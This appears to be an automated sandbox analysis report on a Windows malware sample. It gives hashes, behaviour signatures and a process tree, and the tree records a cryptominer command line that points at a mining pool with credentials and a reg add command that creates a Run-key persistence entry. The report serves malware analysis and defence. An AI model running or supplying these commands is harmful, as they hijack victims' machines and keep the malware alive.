Analysis
-
max time kernel
170s -
max time network
166s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
-
submitted
24-11-2022 21:47
General
-
Target
9ab9af03589bf3821e753a40c7b2899dccf7cc358bbb01b89bb87dc640a5cbb4.exe
-
Size
1.3MB
-
MD5
d08af005a79bb8e5f92e32b52874b722
-
SHA1
7a95179e88f4a6ee33192f13dfc5c2b9d8274bc6
-
SHA256
9ab9af03589bf3821e753a40c7b2899dccf7cc358bbb01b89bb87dc640a5cbb4
-
SHA512
c8893b32215d4b1d57f0143cdc9d7b809fa2adba2fad6826bad52310da0ecc355a06d6b832830e757480bd2174a507ab51d97b7873860f0bbee4c5b296f433b1
-
SSDEEP
24576:esabjkjys3jhmgWKU8tkYphKqK2B54cDW4EmolRCpSSup5Uixp2IQtHZq:esaPkp311Hf3KW1DW4iOSSuptv2d5
Score
7/10
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Uses the VBS compiler for execution 1 TTPs
-
Adds Run key to start application 2 TTPs 2 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 5 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Suspicious behavior: EnumeratesProcesses 48 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of WriteProcessMemory 17 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\9ab9af03589bf3821e753a40c7b2899dccf7cc358bbb01b89bb87dc640a5cbb4.exe"C:\Users\Admin\AppData\Local\Temp\9ab9af03589bf3821e753a40c7b2899dccf7cc358bbb01b89bb87dc640a5cbb4.exe"1⤵
- Checks computer location settings
- Suspicious use of SetThreadContext
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe -a scrypt -o stratum+tcp://hot.wemineltc.com:3334 -u lover83.raid -p lover123123 -T 83 -t 2 -g No2⤵
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Wcenter" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Microsoft\Wcenter82.exe2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Wcenter" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Microsoft\Wcenter82.exe3⤵
- Adds Run key to start application
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/212-165-0x0000000000000000-mapping.dmp
-
memory/1708-172-0x00000000022D0000-0x000000000238D000-memory.dmpFilesize
756KB
-
memory/1708-151-0x00000000022D0000-0x000000000238D000-memory.dmpFilesize
756KB
-
memory/1708-136-0x0000000000400000-0x0000000000642000-memory.dmpFilesize
2.3MB
-
memory/1708-137-0x0000000000400000-0x0000000000642000-memory.dmpFilesize
2.3MB
-
memory/1708-138-0x00000000022D0000-0x000000000238D000-memory.dmpFilesize
756KB
-
memory/1708-143-0x00000000022D0000-0x000000000238D000-memory.dmpFilesize
756KB
-
memory/1708-145-0x00000000022D0000-0x000000000238D000-memory.dmpFilesize
756KB
-
memory/1708-173-0x00000000022D0000-0x000000000238D000-memory.dmpFilesize
756KB
-
memory/1708-147-0x00000000022D0000-0x000000000238D000-memory.dmpFilesize
756KB
-
memory/1708-144-0x00000000022D0000-0x000000000238D000-memory.dmpFilesize
756KB
-
memory/1708-150-0x0000000000400000-0x0000000000642000-memory.dmpFilesize
2.3MB
-
memory/1708-148-0x00000000022D0000-0x000000000238D000-memory.dmpFilesize
756KB
-
memory/1708-149-0x00000000022D0000-0x000000000238D000-memory.dmpFilesize
756KB
-
memory/1708-133-0x0000000000000000-mapping.dmp
-
memory/1708-152-0x00000000022D0000-0x000000000238D000-memory.dmpFilesize
756KB
-
memory/1708-153-0x00000000022D0000-0x000000000238D000-memory.dmpFilesize
756KB
-
memory/1708-154-0x00000000022D0000-0x000000000238D000-memory.dmpFilesize
756KB
-
memory/1708-174-0x00000000022D0000-0x000000000238D000-memory.dmpFilesize
756KB
-
memory/1708-157-0x00000000022D0000-0x000000000238D000-memory.dmpFilesize
756KB
-
memory/1708-156-0x00000000022D0000-0x000000000238D000-memory.dmpFilesize
756KB
-
memory/1708-158-0x00000000022D0000-0x000000000238D000-memory.dmpFilesize
756KB
-
memory/1708-159-0x00000000022D0000-0x000000000238D000-memory.dmpFilesize
756KB
-
memory/1708-160-0x00000000022D0000-0x000000000238D000-memory.dmpFilesize
756KB
-
memory/1708-162-0x00000000022D0000-0x000000000238D000-memory.dmpFilesize
756KB
-
memory/1708-163-0x00000000022D0000-0x000000000238D000-memory.dmpFilesize
756KB
-
memory/1708-164-0x00000000022D0000-0x000000000238D000-memory.dmpFilesize
756KB
-
memory/1708-166-0x00000000022D0000-0x000000000238D000-memory.dmpFilesize
756KB
-
memory/1708-167-0x00000000022D0000-0x000000000238D000-memory.dmpFilesize
756KB
-
memory/1708-168-0x00000000022D0000-0x000000000238D000-memory.dmpFilesize
756KB
-
memory/1708-169-0x00000000022D0000-0x000000000238D000-memory.dmpFilesize
756KB
-
memory/1708-170-0x00000000022D0000-0x000000000238D000-memory.dmpFilesize
756KB
-
memory/1708-171-0x00000000022D0000-0x000000000238D000-memory.dmpFilesize
756KB
-
memory/1708-146-0x00000000022D0000-0x000000000238D000-memory.dmpFilesize
756KB
-
memory/1708-134-0x0000000000400000-0x0000000000642000-memory.dmpFilesize
2.3MB
-
memory/1708-155-0x00000000022D0000-0x000000000238D000-memory.dmpFilesize
756KB
-
memory/1708-175-0x00000000022D0000-0x000000000238D000-memory.dmpFilesize
756KB
-
memory/1708-176-0x00000000022D0000-0x000000000238D000-memory.dmpFilesize
756KB
-
memory/1708-178-0x00000000022D0000-0x000000000238D000-memory.dmpFilesize
756KB
-
memory/1708-179-0x00000000022D0000-0x000000000238D000-memory.dmpFilesize
756KB
-
memory/1708-177-0x00000000022D0000-0x000000000238D000-memory.dmpFilesize
756KB
-
memory/1708-180-0x00000000022D0000-0x000000000238D000-memory.dmpFilesize
756KB
-
memory/1708-181-0x00000000022D0000-0x000000000238D000-memory.dmpFilesize
756KB
-
memory/1708-182-0x00000000022D0000-0x000000000238D000-memory.dmpFilesize
756KB
-
memory/1708-183-0x00000000022D0000-0x000000000238D000-memory.dmpFilesize
756KB
-
memory/1708-184-0x00000000022D0000-0x000000000238D000-memory.dmpFilesize
756KB
-
memory/1708-185-0x00000000022D0000-0x000000000238D000-memory.dmpFilesize
756KB
-
memory/1708-186-0x00000000022D0000-0x000000000238D000-memory.dmpFilesize
756KB
-
memory/1708-187-0x00000000022D0000-0x000000000238D000-memory.dmpFilesize
756KB
-
memory/1708-188-0x00000000022D0000-0x000000000238D000-memory.dmpFilesize
756KB
-
memory/1708-189-0x00000000022D0000-0x000000000238D000-memory.dmpFilesize
756KB
-
memory/1708-190-0x00000000022D0000-0x000000000238D000-memory.dmpFilesize
756KB
-
memory/1708-191-0x00000000022D0000-0x000000000238D000-memory.dmpFilesize
756KB
-
memory/1708-192-0x00000000022D0000-0x000000000238D000-memory.dmpFilesize
756KB
-
memory/1708-193-0x00000000022D0000-0x000000000238D000-memory.dmpFilesize
756KB
-
memory/1708-194-0x00000000022D0000-0x000000000238D000-memory.dmpFilesize
756KB
-
memory/1708-195-0x00000000022D0000-0x000000000238D000-memory.dmpFilesize
756KB
-
memory/1708-196-0x00000000022D0000-0x000000000238D000-memory.dmpFilesize
756KB
-
memory/1708-197-0x00000000022D0000-0x000000000238D000-memory.dmpFilesize
756KB
-
memory/1708-199-0x0000000002390000-0x000000000243E000-memory.dmpFilesize
696KB
-
memory/1708-198-0x00000000022D0000-0x000000000238D000-memory.dmpFilesize
756KB
-
memory/1708-200-0x00000000022D0000-0x000000000238D000-memory.dmpFilesize
756KB
-
memory/1708-201-0x00000000022D0000-0x000000000238D000-memory.dmpFilesize
756KB
-
memory/1708-687-0x0000000000400000-0x0000000000642000-memory.dmpFilesize
2.3MB
-
memory/1708-688-0x0000000002390000-0x000000000243E000-memory.dmpFilesize
696KB
-
memory/1732-161-0x0000000000000000-mapping.dmp
-
memory/4760-132-0x0000000074B90000-0x0000000075141000-memory.dmpFilesize
5.7MB
-
memory/4760-686-0x0000000074B90000-0x0000000075141000-memory.dmpFilesize
5.7MB